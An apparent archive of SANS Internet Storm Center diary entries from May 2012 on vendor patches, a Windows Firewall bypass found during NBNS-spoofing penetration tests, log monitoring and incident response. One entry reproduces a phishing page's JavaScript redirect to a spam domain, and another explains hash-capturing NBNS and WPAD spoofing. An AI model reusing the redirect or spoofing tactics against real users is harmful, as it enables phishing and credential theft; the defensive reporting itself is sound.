Adobe released updates for three security vulnerabilities yesterday, addressing critical vulnerabilities that exist in older versions of the Adobe CS suite products.  As Adobe states, “We are in the process of resolving the vulnerabilities addressed in these Security Bulletins in Adobe Illustrator CS5.x, Adobe Photoshop CS5.x (12.x) and Adobe Flash Professional CS5.x, and will update the respective Security Bulletins once the patches are available”.

The updates released by Adobe can be found here, and the affected products are listed below:

Adobe Illustrator CS5.5
Adobe Photoshop CS5
Adobe Flash Professional CS5.5.1

These vulnerabilities are all critical in nature and, if exploited, could lead to a compromise of the system without user interaction.  They exist in both the Mac and Windows versions of the software, so be on the lookout for more updates for older versions of the Adobe CS suite.


tony d0t carothers -gmail


Published: 2012-05-11

ISC Feature of the Week: Link List


The ISC Links page at https://isc.sans.edu/links.html is a categorized list of information links. You can get to the page from the top-right menu by choosing Tools->Links. The list lets you vote a link up or down, and there's even a form to suggest new links! Results are not updated in real time; voting and URL addition are subject to approval.


Link List - https://isc.sans.edu/links.html#list

  • Links are listed from most to least votes
  • Categories: Internet Status, Malware Information, Security Dashboards, Security Blogs, Vendor Security Advisories
  • Vote "in favor" or "against" a link
  • You may vote as many times as you wish, but only one vote per URL will count.

Add a new Site - https://isc.sans.edu/links.html#add

  1. You must be logged in to submit links
  2. Category: Choose an appropriate category for your link
  3. URL: Paste in the URL you wish to submit
  4. Site Name: Enter a name for the URL you are submitting
  5. Click Submit to suggest the link for the page

Some hints:

  • Submit URLs that point to home pages / main pages, not to specific articles.
  • The page should be related to infosec, internet status or any of the other categories
  • If you submit a blog: It needs to have a few posts first.
  • We try to avoid linking directly to sites providing exploits.
  • Please let us know if we should add categories to the list.


Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form

Adam Swanger, Web Developer (GWEB, GWAPT)
Internet Storm Center - https://isc.sans.edu


Published: 2012-05-10

Safari 5.1.7 - an interesting feature

I am a Mac user, which means my daily browser is Safari.  That had been trouble-free for a number of years, until version 5.1.4 was released in mid-March.  Since that release I have experienced excessive memory consumption, upwards of 1 GB, as the cost of using Safari.  Prior to that release, no noticeable hit to my resources was observed.

I updated my MacBook yesterday and noticed an improvement today.  We'll have to see how long that lasts; it's been less than 24 hours, so it really is too early to tell.

With all that blather stated, an interesting feature can be noted in this most recent release of Safari: out-of-date Adobe Flash Players will be auto-disabled. [1]  Use the link below to get a little more info on it. There is not much more, but it explains how to re-enable an out-of-date Flash player.

If you are unsure what plugin versions you have in your browser, you can mosey over to Google and look for a popular "browsercheck" website.  I would try out the one provided by a vendor whose name begins with a Q.  It is a slick tool that I've used to check on my browser plugin versions.

Feel free to leave us a comment or remark about your Safari travels and experience with this new feature.

ISC Handler on Duty

 [1] http://support.apple.com/kb/HT5271?viewlocale=en_US&locale=en_US


Published: 2012-05-09

Bogus emails: Amazon.com - Your Cancellation

There are bogus order cancellation emails going around claiming to be from Amazon like this:

Dear Customer,

Your order has been successfully canceled. For your reference, here's a summary of your order:

You just canceled order 15-6698-2492 placed on May 9, 2012.Status: CANCELED


1 "Mulberry"; 2006, Special Edition

  By: Sorcha Stewart

Sold by: Amazon.com LLC


Thank you for visiting Amazon.com!



Earth's Biggest Selection



The 15-6698-2492 in the copy I received linked to the URL http://repdesign.pt/requires.html, which contains this in the body:
<script type="text/javascript">window.location="http://leibypharmacylevitra.com";</script>

The web server seems to be down:
--2012-05-09 13:43:19--  (try: 7)  http://leibypharmacylevitra.com/Connecting to leibypharmacylevitra.com||:80... 

It is probably safe to assume that the content of that site is not user friendly.
Here is the full content of the page at repdesign.pt:
<html><head><script type="text/javascript">window.location="http://leibypharmacylevitra.com";</script></head><body><a href="http://leibypharmacylevitra.com">Click</a></body></html>
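When triaging a batch of these, pulling the redirect target out of the page automatically saves some time. A quick, hedged sketch (the regex only covers the simple window.location pattern seen in the page above, nothing obfuscated):

```python
import re

def extract_redirects(html):
    """Find window.location JavaScript redirect targets in a page."""
    return re.findall(r'window\.location\s*=\s*"([^"]+)"', html)

# The exact page content quoted above:
page = ('<html><head><script type="text/javascript">'
        'window.location="http://leibypharmacylevitra.com";</script></head>'
        '<body><a href="http://leibypharmacylevitra.com">Click</a></body></html>')
print(extract_redirects(page))  # ['http://leibypharmacylevitra.com']
```

Real landing pages often obfuscate the redirect, so treat this as a first-pass filter only.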
Handler ISC


Published: 2012-05-09

The day after patch Tuesday; sometimes called Wednesday

This is my first diary entry in several years. I am returning as a handler after a lengthy hiatus. I joined an organization which took too much time and did not permit this kind of interaction. It was worth it. That ride is coming to a close and I am happy to be able to return to this fine organization.

Today many of us are working through the monthly onslaught of patches and updates. Between the Microsoft May 2012 updates, PHP, ESX, and some Adobe updates, there is quite a bit to think about. This is a monthly occurrence, though, and there are a number of steps organizations can take to prepare for this recurring event. A simple one is to mark the second Tuesday on a team calendar: start to clear the deck on the Friday before, and make sure that test systems are ready to go following the Tuesday release.

I have seen a number of approaches to patch preparation. At one extreme, all critical systems are replicated in a lab, patches are applied and a QA team validates key functions. At the other extreme, patches are simply applied and the organization deals with the fallout. Not being an extremist, I like to be somewhere in the middle, depending on organization size, mission, and capability.

There is also the triage effort of reviewing updates and determining how long to wait before applying them. I have seen one organization that waited 10 days after the MSFT release and then applied all released patches, counting on the forums and general buzz about the updates to call out any problems with them. This, of course, can leave the organization open to many other risks if an exploit is in the wild.

I advocate a more hands-on approach, especially with key systems. The organization just mentioned ran into a problem recently where two RADIUS (IAS) servers were taken offline by a patch that modified the CA cert. This brought the IAS servers down, impacting wireless access for several hours while the problem was identified, investigated and resolved. Testing, or patching one system at a time, could have prevented or mitigated this outage.

What are some approaches that work, and some that don’t? Care to share?



Published: 2012-05-08

PHP 5.4.3 and PHP 5.3.13 Released

In addition to other announcements, the folks behind PHP have released new versions in the 5.3 and 5.4 branches to address a couple of security issues.

5.3.13 addresses CVE-2012-2311 and 5.4.3 addresses both CVE-2012-2311 and CVE-2012-2329.

Details are available here: http://www.php.net/archive/2012.php#id2012-05-08-1


Published: 2012-05-08

May Adobe Security Bulletins

Adobe has released their monthly security bulletins today:

Note that APSB12-12 addresses Flash Professional, not the Flash Player add-on in your browser.  Also of note: the first three bulletins simply inform users that their current version of the software is vulnerable and that the upgraded version isn't.  No free security patch option, just pay to upgrade.  At least the Shockwave player update is free.


Published: 2012-05-08

Symantec False-Positive Issue with XLS Files - Bloodhound.Exploit.459

John writes in to report that Symantec has announced an issue with their current definition files that may generate false-positive alerts on .xls files.

Thanks John!


Published: 2012-05-08

Microsoft May 2012 Black Tuesday Update - Overview

Overview of the May 2012 Microsoft patches and their status.

Bulletin | Affected | KB | Known exploits | Microsoft rating(**) | ISC rating(*) (clients / servers)

MS12-029: Microsoft Word RTF Import
(Replaces MS10-079, MS11-089, MS11-094)
Affected: Microsoft Word 2003 and 2007
KB 2680352 | No publicly known exploits | Severity: Critical | Exploitability: 1

MS12-030: Microsoft Office Remote Code Execution Vulnerabilities
(Replaces MS11-072, MS11-089, MS11-094, MS11-096)
Affected: Microsoft Excel 2003/2007/2010
KB 2663830 | Known exploits: Yes (CVE-2012-0143) | Severity: Critical | Exploitability: 3,3,1,1,2,1

MS12-031: Visio Viewer 2010 Remote Code Execution Vulnerability
(Replaces MS12-015)
Affected: Microsoft Visio Viewer 2010
KB 2597981 | No publicly known exploits | Severity: Important | Exploitability: 1

MS12-032: TCP/IP Elevation of Privilege and Firewall Bypass Vulnerability
(Replaces MS11-083)
Affected: TCP/IP, Windows Firewall
KB 2597981 | No publicly known exploits | Severity: Important | Exploitability: 1
ISC rating: important / important

MS12-033: Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege (Plug and Play (PnP) Configuration Manager Vulnerability)
KB 2690533 | Known exploits: Elevation of Privilege | Severity: Important | Exploitability: Likely
ISC rating: important / important

MS12-034: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
(Replaces MS11-029, MS12-018)
Affected: Microsoft Windows, Microsoft .NET Framework, Microsoft Silverlight, Microsoft Office
KB 2681578 | Known exploits: Yes | Severity: Critical | Exploitability: 1,1,1,1,2,1,1,1,1,1

MS12-035: .NET Framework Remote Code Execution
(Replaces MS11-044, MS11-078, MS12-016)
Affected: .NET Framework
KB 2693777 | No publicly known exploits | Severity: Critical | Exploitability: 1
We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. We presume simple best practices for servers, such as not using Outlook, MSIE, Word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

(**): The exploitability rating we show is the worst of them all, because of the large number of ratings Microsoft assigns to some of the patches.


Adam Swanger, Web Developer (GWEB, GWAPT)
Internet Storm Center - https://isc.sans.edu


Published: 2012-05-08

Windows Firewall Bypass Vulnerability and NetBIOS NS

One of the attacks I always perform when doing internal penetration tests is NetBIOS name spoofing. NetBIOS has been a gold mine for penetration testers for years – many good articles about how to use NBNS spoofing have been written, and Metasploit comes with a module that allows you to easily abuse NBNS in order to collect LM and NT hashes from victim machines (depending, of course, on whether LANMAN has been disabled).

I wrote a diary about this back in January so if you want to see details on how to abuse this I’d suggest that you read http://isc.sans.edu/diary.html?storyid=12454 first.

However, attacking clients, retrieving their LM/NT hashes and cracking them, as fun as it is, is only half of the job a penetration tester has to do. Besides capturing the flag, the report you produce must also include recommendations on how to mitigate the detected vulnerability; otherwise it is really useless for your client (no matter how cool it is for us penetration testers to pwn something).

So after seeing NBNS being abused in many internal penetration tests (all?) I started checking what potential security controls we have at our disposal to prevent such attacks, or at least to make them less effective.

Obviously, the best way to prevent NBNS spoofing attacks is to completely disable NetBIOS name resolution. However, this may be easier said than done – from the diary I posted before (link above), it appears that there are many other services that still depend on NBNS.

Since Windows operating systems now come with a firewall (“Windows firewall” with Windows XP SP2 and “Windows Firewall with Advanced Security” with Vista and newer OSes) that can have multiple policies, depending on the current location of the machine (home, work or public networks), this sounded like a perfect idea for preventing NBNS attacks. In this scenario, an administrator that controls client machines through group policies could allow NBNS in home and work networks and disable it completely in public networks. While not perfect, this still offers a certain (and I’d say decent) amount of protection.

However, while testing this I noticed that the Windows firewall has a nasty bypass vulnerability (the now patched CVE-2012-0174 vulnerability).

In order to test it I enabled both inbound and outbound filtering – remember that the Windows built-in firewall does not block outbound connections by default:

Windows Firewall profile settings
Besides this, NBNS rules had to be disabled manually, in order to prevent NB-Name-Out network traffic. By stopping this traffic we would make sure that an attacker cannot abuse NBNS spoofing attacks, since the built-in firewall would stop all such outgoing requests. You can see the rules, with their respective profiles in the following picture:

Windows Firewall settings
After setting this up, I expected that my NBNS spoofing attacks would fail. However, that did not happen – the attacks were still successful, and I was able to see NBNS queries on my local network. After setting up logging in the Windows firewall as well, I confirmed that Windows was happily letting this traffic leave, despite all the rules that had been set above:

2012-01-29 11:07:21 ALLOW UDP 137 137 0 - - - - - - - SEND

This log shows a NBNS query destined to the local network’s broadcast address.
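If you enable Windows firewall logging during this kind of test, scanning the log for stray NBNS traffic is easy to automate. A rough sketch in Python; I am assuming the usual pfirewall.log layout (date, time, action, protocol, then address/port fields), so rather than relying on exact column positions (the line above has fields redacted), it just checks the tokens:

```python
def is_allowed_nbns(line):
    """Heuristically flag firewall log lines showing allowed NetBIOS name
    service traffic: action ALLOW, protocol UDP, a port field of 137.
    Token-based on purpose, since field positions may shift or be redacted."""
    fields = line.split()
    return "ALLOW" in fields and "UDP" in fields and "137" in fields

# The (redacted) log line quoted above:
log_line = "2012-01-29 11:07:21 ALLOW UDP 137 137 0 - - - - - - - SEND"
print(is_allowed_nbns(log_line))  # True
```

Any hit after you have added rules meant to block NB-Name-Out traffic is a sign the rules are not doing what you think.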

The issue here is pretty clear – an organization’s administrator who sets such rules to protect his clients when they leave the organization’s network cannot rely on the built-in Windows firewall!

And, if you take a look at the attack scenarios I mentioned in the first diary, this can be particularly nasty for browsers configured in organizations. For example, a lot of organizations configure browsers on client machines to automatically open intranet portals, which are typically hosted on machines with names “intranet”, “portal” or similar.

When a user with such a machine connects to an open wireless network and opens a browser, the browser will first try to resolve such a name via DNS. When that fails, the machine will try to resolve this name via NBNS and this is where an attacker can fake the response and start collecting LM/NT hashes.

Another very nasty scenario includes machines looking for WPAD (Web Proxy Auto-Discovery). By spoofing this request, an attacker can “push” his own machine as the web proxy and the client’s web browser will happily use it, allowing the attacker to analyze network traffic and at least try to launch Man-in-the-Middle attacks (hopefully, we’ve trained our users not to click on certificate warnings, right?).
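Incidentally, if you want to recognize these queries in a packet capture, NetBIOS names on the wire use RFC 1001 "first-level" encoding: the name is space-padded to 15 bytes, a one-byte service suffix is appended, and each nibble is mapped to a letter starting at 'A'. A small sketch (the helper function and the 0x00 workstation-service default suffix are my own choices):

```python
def encode_netbios_name(name, suffix=0x00):
    """RFC 1001 first-level encoding of a NetBIOS name.
    The name is space-padded to 15 bytes, a suffix byte is appended,
    and each nibble becomes a letter in the range 'A'..'P'."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    return "".join(chr((b >> 4) + 0x41) + chr((b & 0x0F) + 0x41) for b in raw)

# "WPAD" encodes to 'FHFAEBEE' followed by eleven 'CA' pairs (spaces)
# and 'AA' for the 0x00 suffix -- 32 characters total.
print(encode_netbios_name("WPAD"))
```

Spotting that encoded string in NBNS query traffic on an open network is a good hint that clients are hunting for a proxy an attacker could impersonate.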

So, I got in touch with Microsoft and the MSRC guys verified that this is indeed an issue with the firewall. The conversations with the MSRC guys were great and, as you can see, the patch has been released that fixes this vulnerability.

As with other security patches, you should definitely install it as part of your monthly patch cycle. The whole exercise also shows why you should always test the security controls you put in place – just the fact that you added a rule to block certain network traffic does not necessarily mean that the traffic is really blocked.

More information and the patch are available at Microsoft’s web site: http://technet.microsoft.com/en-us/security/bulletin/ms12-032

Advisory details at http://www.infigo.hr/en/in_focus/advisories/INFIGO-2012-05-01



Published: 2012-05-08

New Poll: Which Patch Delivery Schedule Works the Best for You?

I've enabled a new poll today in honor of this month's Patch Tuesday.  In your organization, is it easier to set aside the second week of the month to focus on security patching, or to integrate security patching into everyday system administration?  I've always felt that if your environment is large enough to have its own vulnerability management team, a steady stream of security advisories is preferable to the shock of them all arriving on the same day.  However, not everyone is that size, so it may be easier to schedule widespread reboots on Tuesday nights, saving Wednesday for dealing with any consequences (which seem to be happening less often, thankfully).

Which would you prefer in your environment?


Published: 2012-05-08

Incident-response without NTP


While we patiently await the arrival of this month's patches from Microsoft (and everyone else who publishes today) I have a little thought experiment for you. We all know that the internet doesn't work too efficiently if DNS isn't working or present. NTP is just as critical for your security infrastructure. Without reliable clock synchronization, piecing together what happened during an incident can become extremely difficult.

Consider a hypothetical services network and DMZ: there's an external firewall, a couple of webservers, and an inner firewall with a database server behind it. Let's also assume that something bad happened to the webservers a couple of months ago and you've been brought in as a consultant to piece together the order of events and figure out what the attacker did. The web administration team, the database team, and the firewall team have all responded to your request for logs, and you've got them on your system of choice.

More About NTP

For a complete background on NTP I recommend: http://www.ntp.org/ntpfaq

There are two main types of clock error that we are concerned with in this example:

  • Clock Skew, also called Accuracy: how close a clock is to an official time reference.
  • Clock Drift: the change in accuracy over time.

Common clock hardware is not very accurate; an error of 0.001% causes a clock to be off by nearly one second per day.  We can expect most clocks to have one second of drift every 2 days.  The oscillator used in computer clocks can be influenced by changes in local temperature, and the quality of the electricity feeding the system.
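The arithmetic behind that 0.001% figure is worth making explicit:

```python
SECONDS_PER_DAY = 24 * 60 * 60  # 86400

def drift_seconds_per_day(fractional_error):
    """Seconds a clock gains or loses per day for a given fractional
    frequency error (e.g. 0.001% == 1e-5)."""
    return fractional_error * SECONDS_PER_DAY

# A 0.001% error drifts about 0.86 seconds per day.
print(drift_seconds_per_day(0.001 / 100))  # ~0.864
```

Over the couple of months in our scenario, that kind of error adds up to nearly a minute per unsynchronized host, easily enough to scramble the apparent order of events across systems.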

Today's Challenge

How do you begin to order the events between the systems?  First I'll solicit general approaches via comments and email; later I'll summarize and provide some example data to illustrate the most popular/promising approaches.


Published: 2012-05-07

iOS 5.1.1 Software Update for iPod, iPhone, iPad

Apple released iOS 5.1.1 for iPod, iPhone and iPad (not Mac OS X), available only through iTunes. The update addresses Safari and WebKit issues for iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, and iPad 2. At the time of this writing, the advisory (APPLE-SA-2012-05-07-1) had not yet been posted, but the update is available through iTunes.

[1] http://support.apple.com/kb/HT1222


Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Published: 2012-05-06

Tool updates and Win 8

Rumor has it that somewhere outside the bat cave it is a beautiful summer-ish day, but fear not, we shall shun the sunlight and watch for internet evil.  Well, okay, I'm inside for the moment watching the handlers list, but that probably won't last for long.  Since it has been a slow day, I figured this would be a good time to pass on some info on updates to some of my favorite tools.  In particular, Harlan Carvey has updated RegRipper to v2.5 and laid out his roadmap toward v3.0, which he expects to release later this year.  It doesn't look like this will affect me much personally, since I mostly run RegRipper from the command line on Linux, but it did cause me to update the Parse::Win32Registry perl module on my analysis system to v1.0 (something you may want to do too; see Harlan's post about running into 'big data' issues).

Also, Didier Stevens has updated his TaskManager.xls spreadsheet, which allows injecting shellcode to kill stubborn processes.

And, finally, Windows 8 is available to testers, so I was interested in Amanda C. F. Thomson's Windows 8 Forensics Guide, available for download over at the Propeller Head Forensics blog.






Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu


Published: 2012-05-05

Vulnerability Exploit for Snow Leopard

Today there was a brief discussion among a few Handlers regarding the vulnerability exploit reported by Microsoft in March.  The discussion was not so much about the fact that there was an exploit for a Mac OS, or that it was published by Microsoft; it was focused on the sense of complacency that seems to have developed around Mac products where security is concerned.

Looking back to 2001, Larry Ellison proudly proclaimed Oracle was ‘unbreakable’.  (That statement proved to be untrue, and the hacking community gladly pointed that out to Oracle very quickly.)  At the time, he most likely based his statement on the fact that there were no known vulnerabilities in the database application.  And, at that moment in time, it may have been true.  But time marches on...

While the Mac operating systems may not have the number of vulnerabilities that exist in other operating systems, vulnerabilities do exist, and it is only a matter of time before they play out in public.  We as security professionals would be wise to look at the history of end-user platforms and plan accordingly: as the exposure of these systems increases, the number of reported vulnerabilities will increase.


tony d0t carothers - gmail


Published: 2012-05-05

Vulnerability Assessment Program - Discussions

On a slow Saturday in May I thought I would open the forum here at the ISC for discussion on a topic.  I am working on a project to update the Continuous Vulnerability Assessment (CVA) capability for a client, and I have found a lot of good information on the web.  What I haven’t found a lot of is good experiences.  Guy Bruneau wrote a great article in October on CVA and remediation for the Critical Controls.

First off, what is a vulnerability assessment?  Wikipedia defines it as “the process of identifying, quantifying, and prioritizing (or ranking) the vulnerabilities in a system”.  Vulnerability assessments are often confused with penetration testing; however, these two functions serve different roles in the organization and the overall security assessment.  A CVA program, as a component of the overall enterprise systems management program, needs to consider the process for asset identification, vulnerability reporting and remediation.

The information I have collected runs the gamut of technical and marketing material.  A great report on assessment tools is available here.  Search the web for “Vulnerability Assessment”, “Continuous Vulnerability Assessment”, or “CVA” and the results range greatly: technical, marketing, best practices, etc.  What is not abundant is experiences.  What I’m asking of you today is input on the experiences and challenges you’ve encountered in your implementation or update of a CVA program. I’d love to hear about both the technical and environmental challenges encountered along the way.  Ask yourself “If I had to do it differently, what would I change?”; that’s what I would like to hear.

tony d0t carothers - gmail


Published: 2012-05-04

Adobe Security Flash Update

Adobe released a critical patch for Flash Player addressing an object confusion vulnerability (CVE-2012-0779). If exploited, it could cause the application to crash and potentially allow an attacker to take control of the system. The security bulletin is posted here and the update can be downloaded here.

Affected Software

- Windows, Macintosh and Linux version and earlier
- Android 4.x version and earlier
- Android 3.x and 2.x version and earlier

[1] http://www.adobe.com/support/security/bulletins/apsb12-09.html
[2] http://get.adobe.com/flashplayer/


Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Published: 2012-05-04

ISC Feature of the Week: Data/Reports


We have launched several new data collection projects recently, in addition to the original DShield project. What happens to all that data? When there appears to be enough data to release publicly, the reports will likely be linked from our Reports page at https://isc.sans.edu/reports.html. You can get there by clicking Data/Reports or its sub-menu Summary Page in the top-right menu. We've highlighted some of these projects in past Features, but let's list them all out here.


Data Collection - https://isc.sans.edu/reports.html#collect
This section was added recently as a central location to list new and existing data collection and reporting projects.

Top 10 Ports - https://isc.sans.edu/reports.html#top10ports
Summary table of the top 10 ports listed by Reports, Targets, Sources with link to Port Report Page at https://isc.sans.edu/portreport.html

World Map - https://isc.sans.edu/reports.html#worldmap
Graphics map of country statistics (This deserves more in-depth coverage in another feature diary...Stay Tuned!) with link to Country Report Page at https://isc.sans.edu/countryreport.html

Top Source IPs - https://isc.sans.edu/reports.html#top10source
Top 10 Source IPs as collected by DShield sensor listed with count, number of attacks, first seen and last seen with link to Top Sources Page at https://isc.sans.edu/sources.html

Additional Reports - https://isc.sans.edu/reports.html#additional


Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form
Adam Swanger, Web Developer (GWEB, GWAPT)
Internet Storm Center - https://isc.sans.edu



Published: 2012-05-03

Helping the helpdesk help you

What happens when your helpdesk gets a call from a frantic staff member who’s positive his computer is being hacked by Government X this very second?

The IT helpdesk is the face, voice or automated greeting that most staff and/or customers deal with when calling for help*. Most IT helpdesk staff have run sheets or scripts to walk the caller through common problems or perform basic tests. With scripts and the frequency of typical requests, helpdesk staff can become very slick and effective, making everyone's lives easier. But what happens when a call comes through and it might be a security issue?

Here are some questions to pose to your organisation:

  1. Has there ever been any discussion between the helpdesk and security teams on what should be done if a call is security-related?
  2. Is it scalable, in time and workload, to route every possible security-related call to the security team for an answer?
  3. Should the IT helpdesk staff be provided scripts for basic security procedures other than “Tell them to touch nothing and you call me!”?

Each workplace and environment has its own unique factors in how security-related calls are handled, but let’s imagine the security team doesn’t want to field every call that may or may not have anything to do with a security issue. This is where a helpdesk team could, with guidance and coaching, be invaluable in saving time and effort for all parties.

A crucial first step is to define what the helpdesk should do and what they should definitely not do. This sets clear lines of demarcation, preventing the misunderstandings that can occur in the heat of the moment, when someone attempting to do what they believe is the right thing ends up causing an awful mess.

On the “do” list are:

- Get a clear description of the problem

- Provide standard details on the caller (username, computer details, IP address, location and so on)

- Record only the facts.

On the “should not do” list are:

- Connect to the system to try and fix it themselves

- Offer advice on how to fix the problem

- Jump to unsupported conclusions

- Any other actions that may cause harm or impact.


From this point onwards both the security and helpdesk teams have some ground rules and can work together without causing problems.

Feel free to add any comments, thoughts or suggestions on your experiences, good or bad, on solving this problem.


Chris Mohan--- Internet Storm Center Handler on Duty


* Help – this covers actual questions on topics the IT helpdesk staff are trained in rather than those random questions such as why isn’t the fridge working. In case you were wondering, the correct answer was the fridge’s fuse had blown. Obvious really...


Published: 2012-05-02

Monitoring VMWare logs

Virtualization is so popular today that there is almost no company that does not use a virtualization platform. VMWare is definitely the most popular one (at least the most popular one I seem to be running into).

It is also not uncommon to see VMWare farms growing exponentially, as people tend to throw more hardware at them and just create new VMs. In such cases, controlling what your administrators do is a must, yet organizations that audit their VMWare farms (and especially their administrators’ activities) are pretty rare.

One of the problems is that reviewing VMWare logs can be complex, so it is not easy to set up the whole log collection and analysis system correctly; this is something a lot of SIEMs and similar log collection and analysis tools fail at. So let’s see what we have to work with here and how we can improve things.

System components

For the sake of this diary, I’ll write mainly about the “typical” setups today that consist of ESXi (or ESX, for older setups) host servers and one or more vCenter management servers.

ESXi is VMWare’s host operating system that actually runs the virtual machines. It is highly optimized and has a footprint of only 150 MB. This is what is usually installed on those big servers that today run 20+ virtual machines.

Of course, when you have more than one ESXi server, you want to manage them centrally, not only to make management easier but also to allow more sophisticated features such as vMotion. This management is done through a vCenter server.

vCenter runs on a normal Windows machine, which can itself be a VM. Administrators normally use the VMWare vSphere client application to connect to vCenter and manage virtual machines (depending, of course, on their roles and permissions).

The same client (vSphere client) can be used by an administrator to connect directly to an ESXi server and manage the VMs hosted on that server. As you can probably guess, this creates problems for activity auditing: changes are performed directly on the ESXi host, so vCenter will not see them.

Finally, if you are trying to troubleshoot problems, you can allow SSH access directly to the ESXi hosts. This access is disabled by default, but I have often found that organizations enable it and leave it enabled.

Log collection

We can see that there are multiple system components that generate logs that we should be collecting. While vCenter keeps its own logs and allows reviews from the console, ESXi hosts will also independently keep their logs that should be audited. Actually, when an administrator modifies something in vCenter, a task will be created that will cause vCenter to connect to the target ESXi host and issue the change.

At the moment I’m usually recommending that clients collect logs from the following components:

  • vCenter logs. The VMWare SDK API allows much easier retrieval of logs that will be nice and structured but, if your SIEM does not support it directly, you will have to code a script to retrieve such logs yourself. Do not forget about the OS logs as well as the database logs – since this server is the most important one, make sure that you’ve protected it accordingly and that you collect all other log files that might be important.

  • ESXi host logs. These are also very important since an administrator can connect directly to the hosts (unless this has been prevented). With ESXi there aren’t many options, and probably the best one is to configure the local Syslog daemon to send logs to a central Syslog server, as shown in the picture below.

[Screenshot: VMWare Syslog settings]
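If you prefer the command line (or want to script the change across many hosts), the same setting can be applied with esxcli. This is a sketch assuming an ESXi 5.x host; the loghost name and port are placeholders:

```shell
# Point the ESXi host at a central syslog server (placeholder hostname)
esxcli system syslog config set --loghost='udp://loghost.example.com:514'

# Reload the syslog daemon so the new destination takes effect
esxcli system syslog reload

# Make sure outbound syslog is allowed through the ESXi firewall
esxcli network firewall ruleset set --ruleset-id=syslog --enabled=true
```

Scripting this against every host also gives you a quick way to audit which hosts are (and are not) forwarding their logs.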

Keep in mind, though, that VMWare creates many multi-line logs which will eventually be broken up due to size limits of Syslog, so correlating them on the server side might be quite difficult, if not impossible.
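If you do want to attempt that reassembly on the collection side anyway, a small pre-processor can glue continuation lines back onto the entry they belong to. A minimal sketch, assuming each new entry begins with an ISO-8601 timestamp (the exact prefix depends on your ESXi version and syslog configuration, so adapt the pattern to your own logs):

```python
import re

# A new log entry starts with an ISO-8601 timestamp; anything else is
# treated as a continuation of the previous entry. (Assumption: adjust
# this prefix to whatever your syslog pipeline actually emits.)
ENTRY_START = re.compile(r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}")

def rejoin(lines):
    """Merge continuation lines back into their parent log entry."""
    entries = []
    for line in lines:
        if ENTRY_START.match(line) or not entries:
            entries.append(line.rstrip("\n"))
        else:
            entries[-1] += " " + line.strip()
    return entries
```

Running this before the logs reach your SIEM keeps each multi-line event as a single record, which makes later correlation far easier.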

By using Syslog we will also take care of SSH logins, since these will be logged by the console and sent through Syslog to the central server.


Now that we have all the logs in one place, we can correlate them and set up alerts on suspicious activities.
Regular log reviews are very important. One of the things you should particularly look at is console access. For example, if an administrator who accessed a server’s console through vCenter forgot to log out, any other vCenter administrator can access that server’s console (if he has the vCenter permissions to access it, of course).

Good log collection and correlation (remember to collect both vCenter logs and logs from all your guest servers) can tell you which servers’ consoles were accessed, as well as whether the administrator had to log in.

So check your VMWare environments today and see if you can answer these questions: who logged in to my vCenter console, when and from where? Which VMs were migrated, and which consoles have been accessed by which administrator in the last 30 days?
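To give an idea of what answering the first of those questions can look like once the logs are centralized, here is a minimal sketch that pulls login events out of collected syslog lines. The message format here is hypothetical – real vCenter and ESXi login messages vary by version – so the regular expression would need to be adapted to your own logs:

```python
import re

# Hypothetical login-event format: real vCenter/ESXi messages differ by
# version, so tune this pattern against your own collected syslog.
LOGIN = re.compile(r"User (?P<user>\S+)@(?P<ip>[\d.]+) logged in")

def logins(lines):
    """Yield (timestamp, user, source ip) for every matching login event."""
    for line in lines:
        m = LOGIN.search(line)
        if m:
            ts = line.split()[0]  # leading syslog timestamp
            yield ts, m.group("user"), m.group("ip")
```

A report built from this answers "who, from where and when" directly, and the same approach extends to vMotion and console-access events once you know what those messages look like in your environment.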

Let us know what your experiences with collecting and analyzing VMWare logs are and if you did something you’d like to share with our readers so everyone can benefit from your work.




Published: 2012-05-01

Are Open SSIDs in decline?

After hearing about my wife's iPad disconnecting from wireless for a couple of weeks (ok, maybe a bit longer than that), I decided to do some upgrades to the home network and replace the problem Access Point (an older home unit).

So off to the store I went, and came home with a bright shiny new A/B/G/N AP.  After throwing the DVD away (you know, the one that comes in every box with the outdated firmware on it), and updating the unit to the current rev, my kid and I started setting it up.

It's been a while since I worked on a standalone AP - my builds normally involve controllers and *lots* of APs.  So imagine my surprise and joy when I found that these home units no longer default to an SSID with a default name and no security!  This one started the setup by defaulting to WPA-2 / Personal, and asked me what I wanted to use for a key!  You really have to be determined now to create an Open SSID (good news!)

So are we looking at the long, slow goodnight of open wireless on home networks?  I've written in the past about how tablet users who don't know better routinely "steal" wireless from whoever is close without thinking twice - is this going to get harder and harder for them over the next few years, as people migrate to newer APs?

On the other hand, we're seeing more and more guest networks that are open - coffee shops, municipal offices, hair salons - pretty much anyplace you're likely to spend more than 5 minutes at seems compelled to offer free wireless.  But using free wireless that's offered to you is a much different proposition than stealing it from someone who's misconfigured their home network.

